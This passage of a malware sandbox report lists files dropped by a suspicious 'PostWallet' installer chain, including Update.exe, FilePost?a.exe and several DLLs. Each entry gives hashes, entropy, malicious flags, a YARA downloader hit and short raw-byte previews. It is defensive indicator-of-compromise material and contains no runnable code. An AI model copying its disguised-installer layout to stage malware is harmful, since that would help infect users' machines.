                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):299541
                                        Entropy (8bit):6.022905306278769
                                        Encrypted:false
                                        SSDEEP:6144:TcR7D2COBeKWVDRfULSUMe2xoWZYvkT+ALfmm0T:TcR7D2COBedDRfnxxoRALfmma
                                        MD5:B53021BC0D4329A1567FAFF97CDB624A
                                        SHA1:2B2F8D5147011EB1174D9D7268F1838E7D71875F
                                        SHA-256:8B56C1A8881F34AD52E6530BECB21BE691CB6739472BEFA06835987B6602D9E3
                                        SHA-512:A262769074CCB5909188F28AFD0473BE7A0C1DAC905424FCE6B6E7850003ED0388CE718872010DD64A67B2B488C96E6F69CECB690851FA113776347ABCF9BEB7
                                        Malicious:false
                                        Preview:.; This file contains all localized text for Classic Start Menu. There is one section per language...; Every section contains text lines in the form of <key> = <string>...; Which section is used depends on the current OS setting. If a key is missing from the language section..; it will be searched in the [default] section. In some cases more than one language can be used...; For example a Japanese system may use English as a secondary language. In that case the search order..; will be [ja-JP] -> [en-US] -> [default]...;..; =============================================================================......[default]..Menu.ClassicSettings = Classic Start &Menu..Menu.SettingsTip = Settings for Classic Start Menu......[ar-SA] - Arabic (Saudi Arabia)..Menu.Programs = .....&....Menu.Apps = ...........Menu.AllPrograms = .... .........Menu.Back = .......Menu.Favorites = ....&.....Menu.Documents = ......&.....Menu.Settings = .&........Menu

                                        C:\Program Files\Classic Shell\pack01.zip

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):142
                                        Entropy (8bit):6.55447018279355
                                        Encrypted:false
                                        SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                        MD5:57A37BD0840D0745A9481BCC25B5A792
                                        SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                        SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                        SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                        Malicious:false
                                        Preview:H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

                                        C:\Program Files\Classic Shell\wvtll.zip

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):7426462
                                        Entropy (8bit):7.999967301550424
                                        Encrypted:true
                                        SSDEEP:196608:Tk3prU7StZ/Bfn+O4dyfXQts5CrdMAAbXLdJipAwHKMObs:IprU7Sfn+ORXSHrXAbbiWwHK5I
                                        MD5:B952A1B57AAE836929B07EE6B6306C61
                                        SHA1:F6DF9A789D409F73BF9014F0242E3E503FF2293F
                                        SHA-256:C0D96E4CB03FC72E8357B9095AE0F5160C1699E0470E671E46B12719E70E5665
                                        SHA-512:6D05C2FCC34784FD2567EE507A0E0554EFD56777131552F37FAD84EBCDDDB937B89A5C4EC4BED4489729E92AC2C7B1F90EF8B18F9CE4EE18979FE2D7C91941B2
                                        Malicious:false
                                        Preview:H~.Ea..kyJc..b.G.Q...A..c.{.At...eB_B./6{..........7..w........H..P....M.:..$t~/].?....%...k.uL.<._MN.85x{Uk.<Z......?N-.....O.!(.,D........)R.g..~..V".>?S...&.O......Wq.{.q|....N..pz?c.B.H.f....:...&T>...8.k.iz2.....D..qn..,.."&.'.jSmL.._.@.*..u..r.d>./0......\.."....A..C...~......x6.}......2..../.:..M4....9.[..n...T..N../.%...........Og({.:.s......<...........O.js...Cj.'....<x..#{...{B.)E.r....3.l.....&..*./%`.a/.l.....F.Y...Ka.A...m.E....y.Kp...l.b..3w`V.....;q2.-...j.2..zd..Ofb..5...#...PA...^...&...a....E%.J..#!.....(...r.....rji.Y.$.l.I..../_..Z.[...T.+..&.hw.)......q..vZI....b...R..N.m.;.]...,<.....wv,h1|.r.q..K.....v.).wx......d.$..#..........~....0....v/.o......H....h..!,d^m}.c7.\..%F.........%*<.=.#.?NV.T.....y.:.Y...Xg..9....N.E..F,U.3M;.<..Q..#P..K .w^.<...k.\...2...s.N."...........,.&..8..m;..kr..q..~.H..-...3.mg.l.I.!......O....e.....b.N.`..$g...x.a.E.Gp...@....tn.,.....y..Rod5...N.xl.....V/.Pf.b...r.......6.X.....k7..\..

                                        C:\Program Files\Classic Shell\wvtll.zip1

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):7426462
                                        Entropy (8bit):7.995761675737067
                                        Encrypted:true
                                        SSDEEP:196608:JbvMh/4SWhJe4nsHikPK4sNYN+i4AypzpmOTu/o+TShcj11G:6GJsH2S5LyNBCw17
                                        MD5:947298F38A0962D59A2B735BE4A3DB32
                                        SHA1:5910D9D2A47523C29CD3ACEA6D10C95DD3625BF2
                                        SHA-256:CA66B4329B1AFA52827C01A1920859D63B13C2793AF671C2A03FE527895F7B5E
                                        SHA-512:88327153BD9C15BE968E7DB67429225B79D048008F505A2734DFA976F725873A06AF6052E8564C3484DE6F521CF42090C54C922573D1EE30342260EF24B53000
                                        Malicious:false
                                        Preview:PK.........i.L...ce...8.......ClassicIE_64.exe...@T..8...".XPL4n...j.......\tQ...R.X .kI,.B"^I.-..b..).... J."6../...`=.sf.....>.}.....su8S..93sf..l.y.. ..h..!M.....?.M.[k.....j.....c..icb.G.M..M..m....'j.N..z..N...l......Lq[.....6.j.\....V...m..f..b....n...e.[....>....@A...I.7..j.+.....j..bt..~1/..7f.W...N...P..b........'......*VA}J..*.h. .V..5..V.....U..Y..U......Q.8..)r....A....i.!.mlD.)L..w.8._4...<..G.B;.....h...6.G,...*...../6.6.hX...B..3.".Gc....X..U..u.......o. ..1...Z. J...!..%&'z..O.Tf....w.7.|P..H...[/)..-..v6....@C......3...5...!JerI.r.6]. ....&..1)..u...9.../z.E.(..<Q......'.HoG(.O.....y\.."..y.. 2}.....H.O......CA..o. h6..{3....S....Rv.y.................s...T..j. XW....:......N..I......g..RL..s}-.:...$.g.O...f..U.X.).H.O3.k...3..9.....b..9X09..SY...]....^w. .&^2J<.&...z..(.......UCp.:KEO..2.8z..X..D..<.S..#..f....B.....!.........1...Jt..W.!&.<E1.....%.?...?.>..Z...y.f.<....1...{.......s..7d.n...w..J...kY..2..}.....v....14.

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2751
                                        Entropy (8bit):5.372322730968244
                                        Encrypted:false
                                        SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                        MD5:E186D8CCFA77C108F5C38908EF87820C
                                        SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                        SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                        SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bucketTc[1].zip

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):7426462
                                        Entropy (8bit):7.999967301550424
                                        Encrypted:true
                                        SSDEEP:196608:Tk3prU7StZ/Bfn+O4dyfXQts5CrdMAAbXLdJipAwHKMObs:IprU7Sfn+ORXSHrXAbbiWwHK5I
                                        MD5:B952A1B57AAE836929B07EE6B6306C61
                                        SHA1:F6DF9A789D409F73BF9014F0242E3E503FF2293F
                                        SHA-256:C0D96E4CB03FC72E8357B9095AE0F5160C1699E0470E671E46B12719E70E5665
                                        SHA-512:6D05C2FCC34784FD2567EE507A0E0554EFD56777131552F37FAD84EBCDDDB937B89A5C4EC4BED4489729E92AC2C7B1F90EF8B18F9CE4EE18979FE2D7C91941B2
                                        Malicious:false
                                        Preview:H~.Ea..kyJc..b.G.Q...A..c.{.At...eB_B./6{..........7..w........H..P....M.:..$t~/].?....%...k.uL.<._MN.85x{Uk.<Z......?N-.....O.!(.,D........)R.g..~..V".>?S...&.O......Wq.{.q|....N..pz?c.B.H.f....:...&T>...8.k.iz2.....D..qn..,.."&.'.jSmL.._.@.*..u..r.d>./0......\.."....A..C...~......x6.}......2..../.:..M4....9.[..n...T..N../.%...........Og({.:.s......<...........O.js...Cj.'....<x..#{...{B.)E.r....3.l.....&..*./%`.a/.l.....F.Y...Ka.A...m.E....y.Kp...l.b..3w`V.....;q2.-...j.2..zd..Ofb..5...#...PA...^...&...a....E%.J..#!.....(...r.....rji.Y.$.l.I..../_..Z.[...T.+..&.hw.)......q..vZI....b...R..N.m.;.]...,<.....wv,h1|.r.q..K.....v.).wx......d.$..#..........~....0....v/.o......H....h..!,d^m}.c7.\..%F.........%*<.=.#.?NV.T.....y.:.Y...Xg..9....N.E..F,U.3M;.<..Q..#P..K .w^.<...k.\...2...s.N."...........,.&..8..m;..kr..q..~.H..-...3.mg.l.I.!......O....e.....b.N.`..$g...x.a.E.Gp...@....tn.,.....y..Rod5...N.xl.....V/.Pf.b...r.......6.X.....k7..\..

                                        C:\Users\user\AppData\Local\PostWallet\Update.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1899520
                                        Entropy (8bit):5.894883178349122
                                        Encrypted:false
                                        SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                        MD5:A560BAD9E373EA5223792D60BEDE2B13
                                        SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                        SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                        SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\PostWallet\Update.exe, Author: Joe Security
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                        C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):89392
                                        Entropy (8bit):6.732128875673087
                                        Encrypted:false
                                        SSDEEP:1536:dXkQyiMoenxFAyL79+olDm4Wj7zKRvJQIRb41PxHM73cP0d:dXkQyXpnQm+EU7zKRvJQIRb0xHMDcP0d
                                        MD5:436CEDFA08F245AD52DD221BEC4480A4
                                        SHA1:BDCD2A73AA4AA4C10B3BBCCEA75397CB36E5D058
                                        SHA-256:2ADC7AEEAC540D9DED381D10C24F35A428EAA1298829262F11D1B0BB7AB0F24B
                                        SHA-512:4FF805500006E6E794690E4D67417669A6811206C5A1686F751759B4875A8302D6094C877ECF61A6BE11EE00B87B69C79FEE9CE444EE9F7300074E2CF646D802
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9^O.W.O.W.O.W.)...N.W...V.M.W...V.E.W...V.M.W.F...\.W.O.V.R.W...R.Y.W...S.C.W...T.L.W...S.F.W...R.M.W....N.W...U.N.W.RichO.W.........PE..L.....tc..........................................@..........................@.......Y....@.....................................@.... ..h...............0U...0..D...`...T...............................@...............8............................text.............................. ..`.rdata...b.......d..................@..@.data...............................@....rsrc...h.... ......................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll

                                        Download File
                                        Process:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):5331456
                                        Entropy (8bit):5.9835196660480054
                                        Encrypted:false
                                        SSDEEP:49152:EUphtTpuejnW6Zcpt2UZYCnaSz6lc/FkAdOj1v62Vn032TEB6sic:EMK6ZYt3WZzUF/ic
                                        MD5:430EC455D28552750521DC74B7C60BE8
                                        SHA1:1C10314F5A5E2DF5E61F3DF07863BFF5CAB77DBC
                                        SHA-256:9E39F499B0F494B7C3221F47A576F5C89D769570C64D92ACA332F5A7E4F6243C
                                        SHA-512:3D07C7B6F1F05726A16D378601FF6709BE88831C92644772327890A20039E170770C333E746EBD293B13FA1B788281852BC2B77B506896B48C113BB5203E8B74
                                        Malicious:true
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f,.e.........." .....BB..........iA.......@...............................R...................................... ................I......PI.4Q...@Q..4...PM...............I..n...................................................eI.......I.*....................text...PAB......BB................. ..`.data...('...`B..(...FB.............@....bss..........H..........................idata..4Q...PI..R...nH.............@....didata.*.....I.......H.............@....edata........I.......H.............@..@.rdata..D.....I.......H.............@..@.reloc...n....I..p....H.............@..B.pdata.......PM......DL.............@..@.rsrc....4...@Q..4...&P.............@..@..............R......ZQ.............@..@........................................

                                        C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main1.dll

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5331456
                                        Entropy (8bit):7.999969837632621
                                        Encrypted:true
                                        SSDEEP:98304:n0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8w4:Zv3Pecdiuk3g6WKK7ChUydfn7VsmJMDh
                                        MD5:B4DAC714A14BF703C5F62CEF9250B08E
                                        SHA1:FBCA927E808E9BFB03DD4D18F8D7976DF45C1CA8
                                        SHA-256:083879DC3088B58AF59F1E9CF3A6AE970E8CF8399CA09988D280E6BFDF44C40B
                                        SHA-512:834C561FB7B11DE8BB3C6D4A25410F00D4B5C265C602D8A734C16108913D4E3CD4FD01A47854845F180555936153B63E635DFFF05BEF1B5534916F073943CD74
                                        Malicious:false
                                        Preview:..t#....D..{.$;S....v,.Z.f&..c...VPm..B..@..sY..#...Xyz.k...Nd#..R5.>...i...`. ....R..LLj^..../3.*......".....v.}4..|2..tt".. +6...5.X... 5{..x.u..BA.M.q:[?*!..&...#..C..z.........7f...x.D.../..d.H...w.i......i..<......k)d...]H..d..w.2.>....6.(}.-....e.O.+..j...^1...~.....M.R..L.hia9.......m.W.3.m.+.hl..........#.Py.8[...S..(.&.......$..q.J.......|h;.)...ZQ.D..|5.....$.....?.}*9H..[.s.2..nrCh..Q"...r.)[?...4yN..8..yb.w..."..1&.,}PY.y...t.....55.7..kXf.*.L.....D=j{lG6......@.h.W...D....Lq.^.z..\4'...tvh..o..5[0..Z...#O...\....E..{.. qc.].. ...2?.......g.e..w.kO...J..F..U.y.b4.2.'.u}....c..,.L....9V*...v.H.2. .*...c>.i.y...d.K..r......~...3.~.w.-7Z0. *N7.Ng.~g..;.$x.,.v?.....C.v$k.ri..3W....b.Nm~;.g..W../.....B.E(..lt..>.q.rY..y.'IkX5 ..7.y4).'/Z[r..z.).........K^Z.{W...>.%.c.......@.....#A....4+4...W}.f+&.p."..E..d.8.;js.<..W.M..."....qYv...;.uj..!.;<[....Uv.......f.tt-;.t.6..`.v.....ngT}..JC.m....Nv$..K`-.S`..N... sd2..T....._..r......v3..c....

                                        C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vcruntime140.dll

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):80800
                                        Entropy (8bit):6.781496286846518
                                        Encrypted:false
                                        SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                        MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                        SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                        SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                        SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq..*"..*"..*"..+#..*".."..*"..+"4.*"}.)#..*"}..#..*"}./#..*"}.*#..*"}.."..*"}.(#..*"Rich..*"........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):577024
                                        Entropy (8bit):6.751558391430317
                                        Encrypted:false
                                        SSDEEP:12288:cjR3E7WHbd+OeO+OeNhBBhhBBwOqqVg4MB2l1tWmmmXEstgE61IsEjIA:83DbDOtdMB2Wgg51IsEj7
                                        MD5:534D947D95726726B8EB8E9FAC82483E
                                        SHA1:1745FA80DF5D86E5F077914DED73F581B368ACCF
                                        SHA-256:EC5EF035F0148CAACCC6A2A81657BA67612DC3E521646ED1F65F56712D77F03C
                                        SHA-512:149C0EFC39E1FA4B43BE1642DF6D1B0954AF41F0A9AE992A2E55D7660248F265A90DD17268A33072A441BA59119EEC6D9B94607603F115BFF04F3E2F0CC82BD2
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.nYJ.=YJ.=YJ.=M!.<HJ.=M!.<.J.=M!.<NJ.=90.<VJ.=90.<AJ.=90.<.J.=M!.<PJ.=YJ.=.J.==0.<.J.==0.<[J.==0.<XJ.==0w=XJ.==0.<XJ.=RichYJ.=................PE..L...8..e...........!... .............|....................................... ............@.........................0w.......Y..d...............................XI......p...........................(...@............................................text............................... ..`.rdata..Xr.......t..................@..@.data....N...p...0...R..............@....rsrc...............................@..@.reloc..XI.......J..................@..B........................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\PostWallet\packages\PostWallet-1.0.0-full.nupkg

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:dropped
                                        Size (bytes):5669931
                                        Entropy (8bit):7.999965927440836
                                        Encrypted:true
                                        SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                        MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                        SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                        SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                        SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                        Malicious:false
                                        Preview:PK..........gX................lib/PK..........gX................lib/net48/PK..........gXH.......0]......lib/net48/FilePost.a.exe.].|S...I.6B .[.Z. ..t....R..6.....?....?1A..(K...L..M7...6.2.P.W..-....[....f.j)X..=.._...?.%y..s.=..s.=...-...%CQ.......*.S.....(}.x....#.k-3.....y.......+..|.+..{_...;....-XroA...........5T...1n.....1.]..\.[.{.O^G.~...... .>..}.2...m.....s~.c...t..x.J../..-..,....*.g...V...LE.Y.f.).j.m.;H..K.HsE...63..UQ.8W.r.......oI=..../.$>.ZD......L.5...,J.CQ..^Qf^@........'.N.9...2..p...~....q[...P.uK.}%..E.C.}...O.+....0..F.,.....\.uK.\.F......_...;......../~....I.....[..(....[...j.dE...W.._....~.p.G.9.JF.C$..Z}....h...DYg.\U.<;.U..z.l.C.Z...&+...."^....^..0rO?U...o...D.R.^r....:.........]..K. .-...9..a......G.[e.u..M..z._k....Gr......A...0....?+..o.i.@.........p.9..<(..:h.......mAIc.J..O...(..f.E....9I C....S..(`4.+t.......f..MH......U...g..m...#J.:..e..'8r-..d3V.K.~$$.....3..k.0..+.5.s......@.u...rK.o.....V..<]X.....d......

                                        C:\Users\user\AppData\Local\PostWallet\packages\RELEASES

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):4.9037382300235866
                                        Encrypted:false
                                        SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                        MD5:535A03DF0527BA001F69A849F2495975
                                        SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                        SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                        SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                        Malicious:false
                                        Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931

                                        C:\Users\user\AppData\Local\PostWallet\packages\SquirrelTemp\tempa

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):4.9037382300235866
                                        Encrypted:false
                                        SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                        MD5:535A03DF0527BA001F69A849F2495975
                                        SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                        SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                        SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                        Malicious:false
                                        Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931

                                        C:\Users\user\AppData\Local\SquirrelTemp\PostWallet-1.0.0-full.nupkg

                                        Download File
                                        Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:dropped
                                        Size (bytes):5669931
                                        Entropy (8bit):7.999965927440836
                                        Encrypted:true
                                        SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                        MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                        SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                        SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                        SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                        Malicious:false
                                        Preview:PK..........gX................lib/PK..........gX................lib/net48/PK..........gXH.......0]......lib/net48/FilePost.a.exe.].|S...I.6B .[.Z. ..t....R..6.....?....?1A..(K...L..M7...6.2.P.W..-....[....f.j)X..=.._...?.%y..s.=..s.=...-...%CQ.......*.S.....(}.x....#.k-3.....y.......+..|.+..{_...;....-XroA...........5T...1n.....1.]..\.[.{.O^G.~...... .>..}.2...m.....s~.c...t..x.J../..-..,....*.g...V...LE.Y.f.).j.m.;H..K.HsE...63..UQ.8W.r.......oI=..../.$>.ZD......L.5...,J.CQ..^Qf^@........'.N.9...2..p...~....q[...P.uK.}%..E.C.}...O.+....0..F.,.....\.uK.\.F......_...;......../~....I.....[..(....[...j.dE...W.._....~.p.G.9.JF.C$..Z}....h...DYg.\U.<;.U..z.l.C.Z...&+...."^....^..0rO?U...o...D.R.^r....:.........]..K. .-...9..a......G.[e.u..M..z._k....Gr......A...0....?+..o.i.@.........p.9..<(..:h.......mAIc.J..O...(..f.E....9I C....S..(`4.+t.......f..MH......U...g..m...#J.:..e..'8r-..d3V.K.~$$.....3..k.0..+.5.s......@.u...rK.o.....V..<]X.....d......

                                        C:\Users\user\AppData\Local\SquirrelTemp\RELEASES

                                        Download File
                                        Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):4.9037382300235866
                                        Encrypted:false
                                        SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                        MD5:535A03DF0527BA001F69A849F2495975
                                        SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                        SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                        SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                        Malicious:false
                                        Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931

                                        C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2354
                                        Entropy (8bit):5.347051502078819
                                        Encrypted:false
                                        SSDEEP:48:E/tHkuK9nxIelXbdkM/pu4zs7u4zMPMkZ6QQ6QcIPMkZ6QQiOnwoNEr:ElYUWVYj
                                        MD5:FB7DB7B02AF251FE82B545A649EE2318
                                        SHA1:A1E1A462BB0D5818897A9FB97022017C52551AAB
                                        SHA-256:E6CC5935A23855D8F85EEABE0AC8A4B31BBC5C718A3C22971FBFDFB91C44CB20
                                        SHA-512:95E1F6E20D0CD3161232C03C61A88062E6FEAA00092B91F3A6676AC2961CB3770340E0D547EAE9CFDCE62A3434D6D467D2198FDD7085B948933223863634974E
                                        Malicious:false
